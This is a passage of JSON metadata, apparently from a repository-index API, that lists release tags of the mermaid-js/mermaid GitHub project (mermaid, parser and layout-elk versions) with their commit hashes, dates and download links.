be3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.4.0/manifests"},{"name":"mermaid@11.6.0","sha":"7b2083926dbe3b6280f42376a0d4195b2c72fb8e","kind":"tag","published_at":"2025-03-25T11:43:55.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.6.0/manifests"},{"name":"mermaid@11.5.0","sha":"41a737f6821df4cdeab75643984912b82c1dff7a","kind":"tag","published_at":"2025-03-13T10:34:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.7","sha":"becadf0a7de509b6cc81e99a04abfa6cba8e7bfd","kind":"tag","published_at":"2024-11-27T17:15:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.7","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.7/manifests"},{"name":"@mermaid-js/layout-elk@0.1.6","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.6","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.6/manifests"},{"name":"mermaid@11.4.1","sha":"9868f3a4c3784e214d8b6c74277ca542774e7de9","kind":"tag","published_at":"2024-11-27T11:03:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.1/manifests"},{"name":"mermaid@11.4.0","sha":"56f522ec50b5c746be5532686dd465a06215273d","kind":"tag","published_at":"2024-10-30T15:43:30.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.4.0/manifests"},{"name":"v10.9.3","sha":"85ec96a72d06d45cf5d2b88af6ef0aca2d16c187","kind":"commit","published_at":"2024-10-22T08:32:05.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.3/manifests"},{"name":"@mermaid-js/layout-elk@0.1.5","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.5","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.5/manifests"},{"name":"mermaid@11.3.0","sha":"be574845730b1d9f173c7ddb5fb88a3944949672","kind":"tag","published_at":"2024-10-03T14:43:24.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.3.0/manifests"},{"name":"v10.9.2","sha":"4dd4997c4d73784a239bac04deded9ff6866d2b4","kind":"commit","published_at":"2024-10-02T09:31:48.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.2/manifests"},{"name":"mermaid@11.2.1","sha":"d63dc319c7c57a9900932fe4920be6a4e54570d5","kind":"tag","published_at":"2024-09-16T16:41:37.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.1/manifests"},{"name":"@mermaid-js/layout-elk@0.1.4","sha":"9c41708d9e439f4cf82c0c954e6c40217f6754e4","kind":"tag","published_at":"2024-09-09T14:03:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.4/manifests"},{"name":"mermaid@11.2.0","sha":"80903ec281db9053486f7dbfeae8430d2618e54d","kind":"tag","published_at":"2024-09-09T13:23:06.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.2.0/manifests"},{"name":"mermaid@11.1.1","sha":"73147196b11e38bf825df17ca5f319aa54748b90","kind":"tag","published_at":"2024-09-06T17:19:57.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.1/manifests"},{"name":"mermaid@11.1.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.1.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.3","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.3/manifests"},{"name":"@mermaid-js/parser@0.3.0","sha":"32710c1d995db394ff8cd65c280dbb0a3026630f","kind":"tag","published_at":"2024-09-02T15:18:41.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.3.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.2","sha":"95274278f39a31f00188935f3d7d1f0c3ccc607a","kind":"tag","published_at":"2024-08-24T07:21:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.2/manifests"},{"name":"mermaid@11.0.2","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.2/manifests"},{"name":"@mermaid-js/layout-elk@0.1.1","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.1/manifests"},{"name":"@mermaid-js/parser@0.2.0","sha":"158f9925cedd6e1a205635bd1b45e6dd58cac5f6","kind":"tag","published_at":"2024-08-24T07:06:16.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.2.0/manifests"},{"name":"mermaid@11.0.1","sha":"4d10e3f2586fb8b08b72d93a1036a17d53153997","kind":"tag","published_at":"2024-08-23T15:04:26.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.0.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.0.1/manifests"},{"name":"v11.0.0","sha":"2cfdd1620a8ceef37c0b738569dfb8bcc0005547","kind":"commit","published_at":"2024-08-23T12:07:47.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v11.0.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v11.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v11.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v11.0.0/manifests"},{"name":"v10.9.1","sha":"dab26df9c4ca69cc4a8c46a22286a2f63ea9ed3e","kind":"commit","published_at":"2024-05-14T10:55:39.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.1/manifests"},{"name":"v10.9.0","sha":"da33867ad798872d9f8406532263ff5e569f1185","kind":"commit","published_at":"2024-03-05T17:22:07.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.0/manifests"},{"name":"v10.8.0","sha":"51e7444b94ab0b872eaabc3b138184b47442fab4","kind":"commit","published_at":"2024-02-02T10:10:42.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.8.0/manifests"},{"name":"v10.7.0","sha":"dc857f804e955484b2f92cefc0aaa7b4afb159c4","kind":"commit","published_at":"2024-01-15T09:17:03.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.7.0/manifests"},{"name":"v10.6.1","sha":"65daab2aaf8fc3e54f34b2d468d19486034e06c7","kind":"commit","published_at":"2023-11-06T13:57:01.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.1/manifests"},{"name":"v10.6.0","sha":"29942c04dc92a64f8c618d6d55f9b57800341cf5","kind":"commit","published_at":"2023-10-25T09:07:12.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.6.0/manifests"},{"name":"v10.5.1","sha":"b70959daa7666d25416ab3c4b89ffbc328927d20","kind":"commit","published_at":"2023-10-20T12:30:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.1/manifests"},{"name":"v10.5.0","sha":"bb0d549d0dc489767b240a910a6831b4a7771fd2","kind":"commit","published_at":"2023-10-02T08:00:13.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.5.0/manifests"},{"name":"v10.4.0","sha":"8e5275d8441def82597db534f5a15b27cc6376a7","kind":"commit","published_at":"2023-08-25T12:19:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.4.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.4.0/manifests"},{"name":"v10.3.1","sha":"a0b80f5490f812ccbc74d6246f2ecc39b03db147","kind":"commit","published_at":"2023-08-11T12:03:56.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.1/manifests"},{"name":"v10.3.0","sha":"165e0b6c6862e183c9bdb75fbc5839555bbc99d0","kind":"commit","published_at":"2023-07-26T07:49:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.3.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.3.0/manifests"},{"name":"v10.2.4","sha":"453b337e6e0e6f02357293764c27c29c236fe848","kind":"commit","published_at":"2023-06-30T11:10:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.4/manifests"},{"name":"v10.2.3","sha":"75f9de3d4ae79b8939607872fa9467d5413855ff","kind":"commit","published_at":"2023-06-08T14:24:25.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.3/manifests"},{"name":"v10.2.2","sha":"d2409dc1638f1e8c3d006a3350b598d69d2f7a50","kind":"commit","published_at":"2023-06-02T06:50:59.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.2/manifests"},{"name":"v10.2.1","sha":"48e5d743b3bb0264390644b0d054850d821097e5","kind":"commit","published_at":"2023-06-01T11:03:14.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.1/manifests"},{"name":"v10.2.0","sha":"8d43b87200ba0b59f6800942e03154dccc6b57b7","kind":"commit","published_at":"2023-05-24T17:03:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.2.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.2.0/manifests"},{"name":"v10.1.0","sha":"e7c237dcf3062cd6163e129aedc620ef08d6f89a","kind":"commit","published_at":"2023-04-04T13:19:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.1.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.1.0/manifests"},{"name":"v9.4.3","sha":"1a7b8d38970f367e273b61599e6c4f75a8635158","kind":"commit","published_at":"2023-03-07T18:00:44.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v9.4.3","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v9.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v9.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositorie